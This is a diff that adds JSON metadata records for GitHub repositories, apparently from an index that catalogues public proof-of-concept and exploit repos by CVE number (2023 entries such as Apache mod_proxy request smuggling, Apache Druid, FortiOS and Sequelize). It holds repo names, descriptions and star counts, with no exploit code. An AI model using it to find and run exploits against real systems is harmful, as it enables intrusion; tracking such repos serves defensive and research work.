"visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2516.json b/2023/CVE-2023-2516.json new file mode 100644 index 0000000000..5b15daefd0 --- /dev/null +++ b/2023/CVE-2023-2516.json @@ -0,0 +1,33 @@ +[ + { + "id": 644828521, + "name": "CVE-2023-2516", + "full_name": "mnqazi\/CVE-2023-2516", + "owner": { + "login": "mnqazi", + "id": 32686360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4", + "html_url": "https:\/\/github.com\/mnqazi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-2516", + "description": "Medium Blog", + "fork": false, + "created_at": "2023-05-24T10:44:52Z", + "updated_at": "2023-05-24T10:52:12Z", + "pushed_at": "2023-05-24T10:50:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25194.json b/2023/CVE-2023-25194.json new file mode 100644 index 0000000000..ce5759507e --- /dev/null +++ b/2023/CVE-2023-25194.json @@ -0,0 +1,98 @@ +[ + { + "id": 599535214, + "name": "CVE-2023-25194", + "full_name": "ohnonoyesyes\/CVE-2023-25194", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2023-25194", + "description": null, + "fork": false, + "created_at": "2023-02-09T10:49:46Z", + "updated_at": "2024-08-12T20:29:45Z", + "pushed_at": "2023-02-09T11:00:26Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 92, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 736497233, + "name": "CVE-2023-25194", + "full_name": "YongYe-Security\/CVE-2023-25194", + "owner": { + "login": "YongYe-Security", + "id": 90460865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4", + "html_url": "https:\/\/github.com\/YongYe-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2023-25194", + "description": "CVE-2023-25194 Scan", + "fork": false, + "created_at": "2023-12-28T04:24:02Z", + "updated_at": "2023-12-29T09:06:55Z", + "pushed_at": "2023-12-28T04:33:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787945502, + "name": "cve-2023-25194", + "full_name": "vulncheck-oss\/cve-2023-25194", + "owner": { + "login": "vulncheck-oss", + "id": 134310220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134310220?v=4", + "html_url": "https:\/\/github.com\/vulncheck-oss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vulncheck-oss\/cve-2023-25194", + "description": "A go-exploit for Apache Druid CVE-2023-25194", + "fork": false, + "created_at": "2024-04-17T13:36:34Z", + "updated_at": "2024-10-30T14:55:15Z", + "pushed_at": "2024-11-22T22:44:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-25194", + "go-exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25202.json b/2023/CVE-2023-25202.json new file mode 100644 index 0000000000..a2366bdd0a --- /dev/null +++ b/2023/CVE-2023-25202.json @@ -0,0 +1,33 @@ +[ + { + "id": 758395533, + "name": "CVE-2023-25202", + "full_name": "Trackflaw\/CVE-2023-25202", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-25202", + "description": "CVE-2023-25202: Insecure file upload mechanism", + "fork": false, + "created_at": "2024-02-16T08:22:48Z", + "updated_at": "2024-09-19T07:09:54Z", + "pushed_at": "2024-02-16T08:51:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25203.json b/2023/CVE-2023-25203.json new file mode 100644 index 0000000000..8f6a1e90c6 --- /dev/null +++ b/2023/CVE-2023-25203.json @@ -0,0 +1,33 @@ +[ + { + "id": 758397806, + "name": "CVE-2023-25203", + "full_name": "Trackflaw\/CVE-2023-25203", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-25203", + "description": "CVE-2023-25203: Application Vulnerable to SSRF (Server Side Request Forgery) Attacks", + "fork": false, + "created_at": "2024-02-16T08:29:25Z", + "updated_at": "2024-02-16T08:29:25Z", + "pushed_at": "2024-02-16T08:50:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2523.json b/2023/CVE-2023-2523.json new file mode 100644 index 0000000000..db6c78c6b7 --- /dev/null +++ b/2023/CVE-2023-2523.json @@ -0,0 +1,64 @@ +[ + { + "id": 683376877, + "name": "cve-2023-2523-and-cve-2023-2648", + "full_name": "bingtangbanli\/cve-2023-2523-and-cve-2023-2648", + "owner": { + "login": "bingtangbanli", + "id": 77956516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77956516?v=4", + "html_url": "https:\/\/github.com\/bingtangbanli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bingtangbanli\/cve-2023-2523-and-cve-2023-2648", + "description": "cve-2023-2523-and-cve-2023-2648", + "fork": false, + "created_at": "2023-08-26T11:23:58Z", + "updated_at": "2024-02-02T03:20:29Z", + "pushed_at": "2023-08-26T15:35:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 696169058, + "name": "CVE-2023-2523", + "full_name": "Any3ite\/CVE-2023-2523", + "owner": { + "login": "Any3ite", + "id": 20638313, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20638313?v=4", + "html_url": "https:\/\/github.com\/Any3ite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Any3ite\/CVE-2023-2523", + "description": null, + "fork": false, + "created_at": "2023-09-25T08:21:06Z", + "updated_at": "2023-09-25T17:19:35Z", + "pushed_at": "2023-09-25T08:25:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25234.json b/2023/CVE-2023-25234.json new file mode 100644 index 0000000000..1af8055cda --- /dev/null +++ b/2023/CVE-2023-25234.json @@ -0,0 +1,33 @@ +[ + { + "id": 626394483, + "name": "CVE-2023-25234_Tenda_AC6_stack_overflow", + "full_name": "FzBacon\/CVE-2023-25234_Tenda_AC6_stack_overflow", + "owner": { + "login": "FzBacon", + "id": 48304150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48304150?v=4", + "html_url": "https:\/\/github.com\/FzBacon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FzBacon\/CVE-2023-25234_Tenda_AC6_stack_overflow", + "description": null, + "fork": false, + "created_at": "2023-04-11T11:36:48Z", + "updated_at": "2023-04-20T08:56:58Z", + "pushed_at": "2023-04-20T08:56:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25260.json b/2023/CVE-2023-25260.json new file mode 100644 index 0000000000..941ea0c78c --- /dev/null +++ b/2023/CVE-2023-25260.json @@ -0,0 +1,33 @@ +[ + { + "id": 608529592, + "name": "CVE-2023-25260", + "full_name": "trustcves\/CVE-2023-25260", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2023-25260", + "description": null, + "fork": false, + "created_at": "2023-03-02T07:53:09Z", + "updated_at": "2023-03-27T07:59:36Z", + "pushed_at": "2023-05-02T07:01:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25261.json b/2023/CVE-2023-25261.json new file mode 100644 index 0000000000..3b7a601e94 --- /dev/null +++ b/2023/CVE-2023-25261.json @@ -0,0 +1,33 @@ +[ + { + "id": 608529740, + "name": "CVE-2023-25261", + "full_name": "trustcves\/CVE-2023-25261", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2023-25261", + "description": null, + "fork": false, + "created_at": "2023-03-02T07:53:41Z", + "updated_at": "2023-03-27T07:55:18Z", + "pushed_at": "2023-05-02T07:01:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25262.json b/2023/CVE-2023-25262.json new file mode 100644 index 0000000000..6a2d7fca77 --- /dev/null +++ b/2023/CVE-2023-25262.json @@ -0,0 +1,33 @@ +[ + { + "id": 608530088, + "name": "CVE-2023-25262", + "full_name": "trustcves\/CVE-2023-25262", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2023-25262", + "description": null, + "fork": false, + "created_at": "2023-03-02T07:54:47Z", + "updated_at": "2023-03-27T07:59:48Z", + "pushed_at": "2023-05-02T07:02:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25263.json b/2023/CVE-2023-25263.json new file mode 100644 index 0000000000..fcf11de2ff --- /dev/null +++ b/2023/CVE-2023-25263.json @@ -0,0 +1,33 @@ +[ + { + "id": 608530196, + "name": "CVE-2023-25263", + "full_name": "trustcves\/CVE-2023-25263", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2023-25263", + "description": null, + "fork": false, + "created_at": "2023-03-02T07:55:08Z", + "updated_at": "2023-03-27T07:29:44Z", + "pushed_at": "2023-05-02T07:03:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25292.json b/2023/CVE-2023-25292.json new file mode 100644 index 0000000000..0a7031368b --- /dev/null +++ b/2023/CVE-2023-25292.json @@ -0,0 +1,64 @@ +[ + { + "id": 632617123, + "name": "CVE-2023-25292", + "full_name": "brainkok\/CVE-2023-25292", + "owner": { + "login": "brainkok", + "id": 92050069, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92050069?v=4", + "html_url": "https:\/\/github.com\/brainkok", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brainkok\/CVE-2023-25292", + "description": "Reflected Cross Site Scripting (XSS) in Intermesh BV Group-Office version 6.6.145, allows attackers to gain escalated privileges and gain sensitive information via the GO_LANGUAGE cookie", + "fork": false, + "created_at": "2023-04-25T19:27:53Z", + "updated_at": "2023-04-25T19:27:54Z", + "pushed_at": "2023-11-01T18:11:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 645519272, + "name": "CVE-2023-25292", + "full_name": "tucommenceapousser\/CVE-2023-25292", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-25292", + "description": null, + "fork": false, + "created_at": "2023-05-25T20:56:01Z", + "updated_at": "2023-05-25T20:56:01Z", + "pushed_at": "2023-05-25T20:56:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25355.json b/2023/CVE-2023-25355.json new file mode 100644 index 0000000000..8b747d35eb --- /dev/null +++ b/2023/CVE-2023-25355.json @@ -0,0 +1,33 @@ +[ + { + "id": 852173619, + "name": "CVE-2023-25355-25356", + "full_name": "glefait\/CVE-2023-25355-25356", + "owner": { + "login": "glefait", + "id": 7490317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7490317?v=4", + "html_url": "https:\/\/github.com\/glefait", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/glefait\/CVE-2023-25355-25356", + "description": "CVE-2023-25355 and CVE-2023-25356 with automated service reload", + "fork": false, + "created_at": "2024-09-04T11:00:23Z", + "updated_at": "2024-09-23T13:17:53Z", + "pushed_at": "2024-09-04T15:06:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25581.json b/2023/CVE-2023-25581.json new file mode 100644 index 0000000000..7dbd61038b --- /dev/null +++ b/2023/CVE-2023-25581.json @@ -0,0 +1,33 @@ +[ + { + "id": 873299415, + "name": "CVE-2023-25581", + "full_name": "p33d\/CVE-2023-25581", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2023-25581", + "description": null, + "fork": false, + "created_at": "2024-10-15T23:51:52Z", + "updated_at": "2024-10-16T00:03:25Z", + "pushed_at": "2024-10-16T00:03:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25610.json b/2023/CVE-2023-25610.json new file mode 100644 index 0000000000..1927f32854 --- /dev/null +++ b/2023/CVE-2023-25610.json @@ -0,0 +1,33 @@ +[ + { + "id": 654862635, + "name": "CVE-2023-25610", + "full_name": "qi4L\/CVE-2023-25610", + "owner": { + "login": "qi4L", + "id": 75202638, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75202638?v=4", + "html_url": "https:\/\/github.com\/qi4L", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qi4L\/CVE-2023-25610", + "description": "FortiOS 管理界面中的堆内存下溢导致远程代码执行", + "fork": false, + "created_at": "2023-06-17T06:57:28Z", + "updated_at": "2024-10-29T09:53:40Z", + "pushed_at": "2023-06-21T13:48:25Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 24, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25690.json b/2023/CVE-2023-25690.json new file mode 100644 index 0000000000..62655e840f --- /dev/null +++ b/2023/CVE-2023-25690.json @@ -0,0 +1,107 @@ +[ + { + "id": 632567622, + "name": "linux-apache-fix-mod_rewrite-spaceInURL", + "full_name": "tbachvarova\/linux-apache-fix-mod_rewrite-spaceInURL", + "owner": { + "login": "tbachvarova", + "id": 67585619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67585619?v=4", + "html_url": "https:\/\/github.com\/tbachvarova", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tbachvarova\/linux-apache-fix-mod_rewrite-spaceInURL", + "description": "Fix URL containing SPACES after Apache upgrade CVE-2023-25690", + "fork": false, + "created_at": "2023-04-25T17:15:54Z", + "updated_at": "2024-04-15T22:08:03Z", + "pushed_at": "2023-04-25T21:38:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "fix", + "url" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 643727682, + "name": "CVE-2023-25690-POC", + "full_name": "dhmosfunk\/CVE-2023-25690-POC", + "owner": { + "login": "dhmosfunk", + "id": 45040001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45040001?v=4", + "html_url": "https:\/\/github.com\/dhmosfunk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dhmosfunk\/CVE-2023-25690-POC", + "description": "CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability.", + "fork": false, + "created_at": "2023-05-22T03:06:31Z", + "updated_at": "2024-11-21T17:57:55Z", + "pushed_at": "2024-08-24T13:38:50Z", + "stargazers_count": 270, + "watchers_count": 270, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache2", + "cve", + "cve-2023-25690-poc", + "http-request-smuggling", + "http-request-splitting", + "httpd", + "poc" + ], + "visibility": "public", + "forks": 36, + "watchers": 270, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 727337033, + "name": "CVE-2023-25690", + "full_name": "thanhlam-attt\/CVE-2023-25690", + "owner": { + "login": "thanhlam-attt", + "id": 79523444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79523444?v=4", + "html_url": "https:\/\/github.com\/thanhlam-attt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thanhlam-attt\/CVE-2023-25690", + "description": null, + "fork": false, + "created_at": "2023-12-04T16:58:53Z", + "updated_at": "2024-02-16T07:38:48Z", + "pushed_at": "2023-12-05T16:04:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25725.json b/2023/CVE-2023-25725.json new file mode 100644 index 0000000000..be4c01f6cc --- /dev/null +++ b/2023/CVE-2023-25725.json @@ -0,0 +1,33 @@ +[ + { + "id": 681930748, + "name": "LAB-CVE-2023-25725", + "full_name": "sgwgsw\/LAB-CVE-2023-25725", + "owner": { + "login": "sgwgsw", + "id": 43614862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43614862?v=4", + "html_url": "https:\/\/github.com\/sgwgsw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sgwgsw\/LAB-CVE-2023-25725", + "description": "Lab environment to test CVE-2023-25725", + "fork": false, + "created_at": "2023-08-23T04:32:54Z", + "updated_at": "2023-08-23T16:53:12Z", + "pushed_at": "2023-08-23T17:02:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2579.json b/2023/CVE-2023-2579.json new file mode 100644 index 0000000000..00bc5c94b8 --- /dev/null +++ b/2023/CVE-2023-2579.json @@ -0,0 +1,39 @@ +[ + { + "id": 630988412, + "name": "poc-cve-xss-inventory-press-plugin", + "full_name": "0xn4d\/poc-cve-xss-inventory-press-plugin", + "owner": { + "login": "0xn4d", + "id": 85083396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85083396?v=4", + "html_url": "https:\/\/github.com\/0xn4d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xn4d\/poc-cve-xss-inventory-press-plugin", + "description": "PoC for CVE-2023-2579", + "fork": false, + "created_at": "2023-04-21T16:22:10Z", + "updated_at": "2023-05-30T13:33:40Z", + "pushed_at": "2023-06-23T10:50:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cross-site-scripting", + "cve-2023-2579", + "inventory-press-plugin", + "wordpress", + "xss" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25813.json b/2023/CVE-2023-25813.json new file mode 100644 index 0000000000..50e6616c7b --- /dev/null +++ b/2023/CVE-2023-25813.json @@ -0,0 +1,157 @@ +[ + { + "id": 789840283, + "name": "Sequelize-1day-CVE-2023-25813", + "full_name": "bde574786\/Sequelize-1day-CVE-2023-25813", + "owner": { + "login": "bde574786", + "id": 102010541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102010541?v=4", + "html_url": "https:\/\/github.com\/bde574786", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bde574786\/Sequelize-1day-CVE-2023-25813", + "description": null, + "fork": false, + "created_at": "2024-04-21T17:39:05Z", + "updated_at": "2024-04-28T03:51:43Z", + "pushed_at": "2024-04-28T03:51:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835791874, + "name": "CVE-2023-25813", + "full_name": "White-BAO\/CVE-2023-25813", + "owner": { + "login": "White-BAO", + "id": 170318931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170318931?v=4", + "html_url": "https:\/\/github.com\/White-BAO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/White-BAO\/CVE-2023-25813", + "description": "12", + "fork": false, + "created_at": "2024-07-30T14:36:48Z", + "updated_at": "2024-08-04T07:05:51Z", + "pushed_at": "2024-08-04T05:26:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884065369, + "name": "CVE-2023-25813", + "full_name": "pbj2647\/CVE-2023-25813", + "owner": { + "login": "pbj2647", + "id": 151702008, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151702008?v=4", + "html_url": "https:\/\/github.com\/pbj2647", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pbj2647\/CVE-2023-25813", + "description": null, + "fork": false, + "created_at": "2024-11-06T04:28:36Z", + "updated_at": "2024-11-07T15:21:16Z", + "pushed_at": "2024-11-07T15:20:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884862453, + "name": "CVE-2023-25813", + "full_name": "wxuycea\/CVE-2023-25813", + "owner": { + "login": "wxuycea", + "id": 129142444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129142444?v=4", + "html_url": "https:\/\/github.com\/wxuycea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wxuycea\/CVE-2023-25813", + "description": "CVE-2023-25813 Vulnerability Reproduction - SQL Injection in Sequelize", + "fork": false, + "created_at": "2024-11-07T14:21:38Z", + "updated_at": "2024-11-10T06:14:15Z", + "pushed_at": "2024-11-10T06:14:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 885806935, + "name": "cve-2023-25813", + "full_name": "sea-middle\/cve-2023-25813", + "owner": { + "login": "sea-middle", + "id": 179393914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179393914?v=4", + "html_url": "https:\/\/github.com\/sea-middle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sea-middle\/cve-2023-25813", + "description": null, + "fork": false, + "created_at": "2024-11-09T12:57:46Z", + "updated_at": "2024-11-09T12:59:52Z", + "pushed_at": "2024-11-09T12:59:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2591.json b/2023/CVE-2023-2591.json new file mode 100644 index 0000000000..bfa95beeec --- /dev/null +++ b/2023/CVE-2023-2591.json @@ -0,0 +1,33 @@ +[ + { + "id": 644828673, + "name": "CVE-2023-2591", + "full_name": "mnqazi\/CVE-2023-2591", + "owner": { + "login": "mnqazi", + "id": 32686360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4", + "html_url": "https:\/\/github.com\/mnqazi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-2591", + "description": "CVE-2023-2591 Medium blog", + "fork": false, + "created_at": "2023-05-24T10:45:22Z", + "updated_at": "2023-05-24T10:57:53Z", + "pushed_at": "2023-05-24T10:56:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2594.json b/2023/CVE-2023-2594.json new file mode 100644 index 0000000000..42414c6f0a --- /dev/null +++ b/2023/CVE-2023-2594.json @@ -0,0 +1,33 @@ +[ + { + "id": 638797642, + "name": "CVE-2023-2594", + "full_name": "thehackingverse\/CVE-2023-2594", + "owner": { + "login": "thehackingverse", + "id": 86924237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86924237?v=4", + "html_url": "https:\/\/github.com\/thehackingverse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thehackingverse\/CVE-2023-2594", + 